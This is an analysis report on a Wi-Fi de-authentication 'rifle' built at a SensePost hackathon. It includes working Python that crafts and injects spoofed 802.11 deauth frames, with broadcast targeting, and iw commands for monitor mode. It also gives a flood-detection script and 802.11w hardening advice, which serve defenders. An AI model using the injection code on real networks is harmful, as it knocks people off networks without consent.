Full Report
Wireless: it's everywhere these days and yet owning it never gets boring. As part of our annual SensePost hackathon, where we get time off projects and spend a week tinkering with tech and ideas, the team I was in, consisting of Dominic, Nathi and myself, decided on creating a wireless rifle de-authentication gun, which utilised a Yagi antenna and a Raspberry Pi. The idea was simple: simulate some of the tools available in the aircrack-ng wireless hacking suite in one script, but without utilising aircrack-ng in the process.
Analysis Summary
# Tool/Technique: WiFi De-authentication Rifle (Custom Script)
## Overview
A custom Python script developed during a SensePost hackathon designed to simulate the functionality of tools found in the Aircrack-ng wireless hacking suite, specifically focusing on **de-authentication attacks**, without using Aircrack-ng itself. The tool leverages a Raspberry Pi, a Yagi antenna, and several Python libraries to achieve wireless monitoring and packet injection.
## Technical Details
- Type: Tool (Custom Script/Proof of Concept)
- Platform: Linux (uses the `iw` utility, raw `AF_PACKET` sockets and a Python environment; built on a Raspberry Pi, so a Raspbian or Kali image is the likely host).
- Capabilities: Monitor mode activation, channel hopping, traffic sniffing, 802.11 packet parsing (management/data frames), BSSID/SSID/Client MAC extraction, and custom generation/injection of 802.11 De-authentication packets.
- First Seen: July 13, 2015 (Publication Date)
## MITRE ATT&CK Mapping
This tool combines passive wireless reconnaissance (monitor-mode sniffing with channel hopping to enumerate APs and their clients) with **Impact** via denial of service against the selected clients.
- **TA0040 - Impact**
  - T1499 - Endpoint Denial of Service (de-authentication flooding; none of the T1499 sub-techniques describes an 802.11 management-frame flood exactly, so the parent technique is the closest fit)
- **TA0007 - Discovery**
  - T1040 - Network Sniffing (monitor-mode capture of 802.11 management and data frames to extract BSSIDs, SSIDs and associated client MACs; ATT&CK for ICS names this behaviour directly as T0887 Wireless Sniffing)
## Functionality
### Core Capabilities
1. **Monitor Mode Setup:** Uses the `iw` command to place a specified wireless device into monitor mode (`mon0`) and brings the interface up.
* Command example: `iw dev %s interface add mon0 type monitor && ifconfig mon0 up`
2. **Channel Hopping:** Runs in a separate process, randomly selecting channels (1-13) and using `iw` to change the monitor interface's channel.
* Command example: `iw dev "mon0" set channel %d`
3. **Traffic Sniffing:** Utilizes **pcapy** to open a live capture session on the monitor interface (`mon0`) in promiscuous mode.
4. **Packet Parsing:** Employs **impacket**'s decoding capabilities (`_ImpactDecoder.RadioTapDecoder()`) along with custom logic to parse captured 802.11 frames (Data or Management).
5. **Information Extraction:** Pulls the BSSID and SSID from management frames, client MAC addresses from `address2` (the transmitter address) of data frames, and signal strength and channel from the RadioTap header.
6. **User Interface:** Uses **urwid** (a console UI library; it can render through curses but is not an ncurses wrapper) to display the captured SSID/BSSID list and take the user's target selection.
### Advanced Features
1. **Custom De-authentication Packet Generation:** Leverages **impacket** raw packet generation capabilities to construct a valid de-authentication sequence:
* Creates a **RadioTap** header (setting channel).
* Contains a **Dot11** frame (setting type/subtype to De-authentication).
* Contains a **Dot11ManagementFrame** (setting Source MAC/BSSID, Destination MAC/Client MAC, Sequence Number).
* Contains a **Dot11ManagementDeauthentication** frame.
2. **Packet Injection:** Sends the precisely constructed de-authentication packet via raw sockets (`socket.AF_PACKET, socket.SOCK_RAW`) bound to the monitor interface (`mon0`), impersonating the AP's BSSID as the source.
3. **Targeting Flexibility:** Capable of targeting a specific client MAC address or targeting all clients associated with an AP (by using the broadcast address as the destination).
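The de-authentication frame the tool builds and injects, rebuilt here in plain Python as an added example (this is not the hackathon script, which used impacket for the same layout). It packs the RadioTap header with only the Channel field, the 24-byte 802.11 management header with the AP's BSSID spoofed into the source address, and the 2-byte reason code, then parses the result back. The BSSID and client MAC are made up, reason code 7 ("class 3 frame received from non-associated station") is a choice rather than the script's value, and `inject()` mirrors the script's raw-socket send but needs root and a monitor-mode interface, so it is only called from `main`:

```python
import socket
import struct

# Constructed values for this example; not taken from the original post.
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_FROM_NONASSOC = 7  # reason code chosen for the example


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def channel_to_freq(channel: int) -> int:
    # 2.4 GHz band only, matching the 1-13 range the tool hops over.
    if not 1 <= channel <= 13:
        raise ValueError("channel must be 1..13")
    return 2407 + 5 * channel


def build_radiotap(channel: int) -> bytes:
    # Minimal RadioTap header: version, pad, length, present bitmap with only
    # the Channel field (bit 3), then freq (u16 LE) and channel flags (u16 LE).
    present = 1 << 3
    chan_flags = 0x0080 | 0x0020  # 2 GHz spectrum, CCK modulation
    body = struct.pack("<HH", channel_to_freq(channel), chan_flags)
    return struct.pack("<BBHI", 0, 0, 8 + len(body), present) + body


def build_deauth(bssid: str, client: str, seq: int, channel: int = 6,
                 reason: int = REASON_CLASS3_FROM_NONASSOC) -> bytes:
    # Frame Control: protocol 0, type 0 (management), subtype 12 (deauth).
    # The flags byte is 0, so the Protected Frame bit is clear: a client that
    # requires 802.11w will discard this frame because it carries no MIC.
    fc = struct.pack("<BB", (12 << 4) | (0 << 2) | 0, 0x00)
    duration = struct.pack("<H", 0)
    addr1 = mac_to_bytes(client)   # DA: one victim, or broadcast for all clients
    addr2 = mac_to_bytes(bssid)    # SA: spoofed as the AP
    addr3 = mac_to_bytes(bssid)    # BSSID
    seq_ctrl = struct.pack("<H", (seq & 0x0FFF) << 4)  # fragment number 0
    body = struct.pack("<H", reason)
    return (build_radiotap(channel) + fc + duration
            + addr1 + addr2 + addr3 + seq_ctrl + body)


def parse_deauth(frame: bytes) -> dict:
    # Skip RadioTap by its self-declared length, then decode the management
    # header; the reason code follows it only for deauth frames.
    rt_len = struct.unpack_from("<H", frame, 2)[0]
    dot11 = frame[rt_len:]
    fc0, fc1 = dot11[0], dot11[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    seq_ctrl = struct.unpack_from("<H", dot11, 22)[0]
    info = {
        "type": ftype,
        "subtype": subtype,
        "protected": bool(fc1 & 0x40),   # Protected Frame bit
        "dst": bytes_to_mac(dot11[4:10]),
        "src": bytes_to_mac(dot11[10:16]),
        "bssid": bytes_to_mac(dot11[16:22]),
        "seq": seq_ctrl >> 4,
        "broadcast": bytes_to_mac(dot11[4:10]) == BROADCAST,
    }
    if ftype == 0 and subtype == 12:
        info["reason"] = struct.unpack_from("<H", dot11, 24)[0]
    return info


def inject(iface: str, frame: bytes) -> int:
    # Raw-socket injection as the tool does it: AF_PACKET/SOCK_RAW bound to the
    # monitor interface. The driver appends the FCS. Linux and root only.
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    try:
        s.bind((iface, 0))
        return s.send(frame)
    finally:
        s.close()


if __name__ == "__main__":
    frame = build_deauth("00:11:22:33:44:55", BROADCAST, seq=1, channel=6)
    print(frame.hex())
    print(parse_deauth(frame))
    # inject("mon0", frame)  # uncomment on a monitor-mode interface, as root
```

Two things the layout makes visible: targeting all clients is nothing more than putting the broadcast address in `addr1`, and the frame has no integrity protection at all, which is exactly the gap that 802.11w closes by making a PMF-capable client ignore any de-authentication frame whose Protected bit and MIC are missing.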
## Indicators of Compromise
This is a custom proof-of-concept built for a hackathon, not malware, so file-based IoCs do not apply; the observable artifacts are its setup steps on the host and its behaviour on the air:
- File Hashes: N/A (Tool source code, not persistent malware payload)
- File Names: Custom script filename (Not specified in the article, typically Python script)
- Registry Keys: N/A
- Network Indicators: N/A (Operates locally on Wi-Fi frames, does not utilize C2 by design)
- Behavioral Indicators:
  * Creation of a monitor-mode virtual interface (`mon0`) on a wireless adapter and bringing it up.
  * Rapid, repeated 802.11 channel changes on that interface, driven by a separate channel-hopping process.
  * Injection of raw 802.11 De-authentication management frames, with the AP's BSSID as source, towards specific client MACs or the broadcast address.
## Associated Threat Actors
- None. The tool was written by a SensePost hackathon team (Dominic, Nathi and the author, 'saif') as research.
- Not associated with any known criminal or state-sponsored threat actor.
## Detection Methods
- Signature-based detection: Not applicable; the tool is a short custom Python script and no public sample exists to derive a signature from. On the host running it, the only file-side signal is a Python process that spawns `iw ... interface add ... type monitor` and repeated `iw ... set channel` commands while holding a pcapy capture handle and an `AF_PACKET` raw socket on the wireless interface.
- Behavioral detection: Over the air, a WIDS/WIPS or any monitor-mode sensor can flag bursts of de-authentication frames whose source address is the AP's BSSID, particularly with a broadcast destination, since a legitimate AP rarely needs to de-authenticate every client at once. Because the script hops channels, the sensor sees the flood appear and disappear across channels rather than on one. If the BSS requires 802.11w, any de-authentication frame without management-frame protection is by definition spoofed and can be alerted on directly.
- YARA rules: Not available.
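The over-the-air behavioural check described above, as an added example of the detection logic rather than anything from the original post: a sliding-window count of deauth/disassoc frames per (BSSID, source address) over decoded frame records. The records are constructed for this example and laid out as tab-separated fields in the order `frame.time_epoch`, `wlan.fc.type_subtype`, `wlan.bssid`, `wlan.sa`, `wlan.da`, `wlan.fixed.reason_code` (the shape `tshark -T fields` would emit for those fields; that layout, the threshold and the window are assumptions, and the MACs are made up):

```python
from collections import defaultdict, deque

# wlan.fc.type_subtype values: management type 0, subtypes 0x0c and 0x0a.
DEAUTH, DISASSOC = 0x0c, 0x0a
BROADCAST = "ff:ff:ff:ff:ff:ff"

AP = "00:11:22:33:44:55"

# Constructed sample: one client leaving normally, one disassoc from the AP,
# one beacon, then a 12-frame broadcast deauth burst spoofing the AP's BSSID.
SAMPLE = (
    f"1436780000.10\t0x000c\t{AP}\taa:bb:cc:00:00:01\t{AP}\t3\n"
    f"1436780030.40\t0x000a\t{AP}\t{AP}\taa:bb:cc:00:00:02\t8\n"
    f"1436780100.00\t0x0008\t{AP}\t{AP}\t{BROADCAST}\t\n"
    + "".join(
        f"{1436780200 + i * 0.05:.2f}\t0x000c\t{AP}\t{AP}\t{BROADCAST}\t7\n"
        for i in range(12)
    )
)


def parse_record(line: str) -> dict:
    ts, type_subtype, bssid, sa, da, reason = line.rstrip("\n").split("\t")
    return {
        "ts": float(ts),
        "type_subtype": int(type_subtype, 0),   # accepts "0x000c" or "12"
        "bssid": bssid,
        "sa": sa,
        "da": da,
        "reason": int(reason) if reason else None,
    }


def detect_deauth_flood(lines, threshold: int = 10, window: float = 5.0) -> list:
    # Keep, per (BSSID, transmitter), the timestamps of deauth/disassoc frames
    # seen inside the last `window` seconds; alert once a key reaches
    # `threshold` frames in that window. Keying on the transmitter catches the
    # tool's spoofing, because every injected frame claims the AP as sender.
    recent = defaultdict(deque)
    alerts, alerted = [], set()
    for line in lines:
        if not line.strip():
            continue
        ev = parse_record(line)
        if ev["type_subtype"] not in (DEAUTH, DISASSOC):
            continue
        key = (ev["bssid"], ev["sa"])
        q = recent[key]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "bssid": ev["bssid"],
                "source": ev["sa"],
                "count": len(q),
                "first": q[0],
                "last": ev["ts"],
                # Both flags true is the tool's signature: the AP's own address
                # blasting deauths at everyone.
                "spoofed_ap": ev["sa"] == ev["bssid"],
                "broadcast": ev["da"] == BROADCAST,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE.splitlines(keepends=True)):
        print(alert)
```

The three benign records never trip the rule: a client deauthenticating itself and a single AP-originated disassociation are normal, and they fall outside the window by the time the burst starts. Threshold and window need tuning per environment, since some controllers do send de-authentications during roaming or band steering; the broadcast-destination and spoofed-AP flags are what separate an attack from that background.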
## Mitigation Strategies
- **Prevention Measures:** An unprotected de-authentication frame cannot be blocked once it is on the air: any station that receives it and does not require management-frame protection will act on it. Disabling monitor mode on your own endpoints achieves nothing, because the attacker injects from their own adapter. The only real prevention is management-frame protection on both the AP and the clients.
- **Hardening Recommendations:** Enable 802.11w Protected Management Frames and make it required rather than optional (in hostapd, `ieee80211w=2`), so that de-authentication and disassociation frames carry a MIC the attacker cannot produce; a PMF client then discards any such frame that is not integrity-protected, which defeats this tool outright. WPA3 mandates PMF, so moving to WPA3 brings the protection by default, while WPA2 networks have to turn it on explicitly and must check that every client supports it before setting it to required. PMF does not stop RF jamming or other physical-layer denial of service, so pair it with a WIDS that alerts on de-authentication bursts.
## Related Tools/Techniques
- Aircrack-ng suite (specifically `aireplay-ng` for de-authentication).
- Scapy (mentioned as difficult to work with alongside threading, indicating it could have been an alternative packet crafting library used).
- MDK3/MDK4 (other tools capable of similar Wi-Fi denial of service attacks).